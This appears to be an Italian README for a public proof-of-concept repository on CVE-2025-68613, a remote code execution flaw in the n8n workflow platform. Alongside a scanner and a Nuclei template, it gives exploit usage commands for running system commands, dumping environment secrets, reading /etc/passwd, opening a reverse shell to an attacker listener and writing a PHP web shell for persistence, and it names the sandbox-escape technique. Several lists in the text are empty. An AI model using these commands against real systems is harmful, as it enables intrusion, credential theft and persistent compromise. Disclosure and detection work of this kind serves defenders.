
PoC pubblico + Scanner e ricerca per CVE-2025-68613: RCE critica in n8n Workflow Automation tramite Expression Injection (CVSS 10.0). Include strumenti di rilevamento, exploit completo e guida alla remedazione.

CVE-2025-68613 è una vulnerabilità critica di esecuzione di codice remoto (RCE) scoperta in n8n, una popolare piattaforma open-source di automazione dei flussi di lavoro. Questa vulnerabilità consente agli utenti autenticati di eseguire codice arbitrario sul server, portando potenzialmente al completo compromesso del sistema.
n8n è una piattaforma open-source di automazione dei flussi di lavoro che consente agli utenti di:
Le organizzazioni usano n8n per:
Questo ruolo centrale nell'infrastruttura IT rende le vulnerabilità particolarmente pericolose, poiché possono fornire agli aggressori l'accesso a intere reti e a dati sensibili.
Questo repository include strumenti pronti all'uso per il rilevamento delle vulnerabilità e i test di sfruttamento:
cve-2025-68613-scanner.pyScopo: Rilevamento sicuro e non sfruttante delle istanze n8n vulnerabili
Caratteristiche:
Utilizzo:```bash python3 cve-2025-68613-scanner.py -u http://target:5678
**Output**:
- Codice di uscita 0: Non vulnerabile
- Codice di uscita 1: Versione indeterminata (potrebbe essere patchata o nascosta)
- Codice di uscita 2: Versione vulnerabile rilevata
### 2. Template Nuclei: `CVE-2025-68613.yaml`
**Scopo**: Rilevamento automatico delle vulnerabilità e test di base di valutazione delle espressioni
**Caratteristiche**:
- Richiede un token di autenticazione valido
- Verifica la capacità di iniezione delle espressioni
- Tenta di leggere il contesto globale di Node.js (process.platform)
- Crea workflow di test per validare il vettore RCE
- Classificazione di gravità critica CVSS 10.0
**Utilizzo**:```bash
# Single target with known token
nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v
# Multiple targets
nuclei -t CVE-2025-68613.yaml -l targets.txt
exploit_cve-2025-68613.pyScopo: Proof-of-concept completo di sfruttamento con molteplici payload di attacco
Caratteristiche:
Requisiti:
Installazione:```bash pip install requests chmod +x exploit_cve-2025-68613.py
**Esempi di utilizzo**:```bash
# Gather system information
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload info
# Execute system command (whoami)
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload cmd --command "whoami"
# Extract all environment variables (credentials, API keys)
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload env
# Read sensitive files
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload read --file "/etc/passwd"
# Establish reverse shell (requires netcat listener)
# On attacker machine: nc -lvnp 4444
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444
# Write a web shell for persistence
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload write \
--file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'
Come Funziona:
this.constructor.constructor()process.platform o altre API Node.jsCodici di Uscita:
In termini semplici: n8n consente agli utenti di scrivere espressioni nei workflow per elaborare i dati dinamicamente. Tuttavia, queste espressioni vengono valutate senza un adeguato sandboxing, consentendo agli attaccanti di uscire dal contesto di esecuzione previsto ed eseguire codice arbitrario sul server.
Quando crei un workflow in n8n, puoi utilizzare "espressioni" per manipolare i dati. Queste espressioni dovrebbero essere eseguite in un ambiente ristretto. Tuttavia, la vulnerabilità dimostra che queste espressioni possono accedere al sistema sottostante, consentendo a un attaccante di: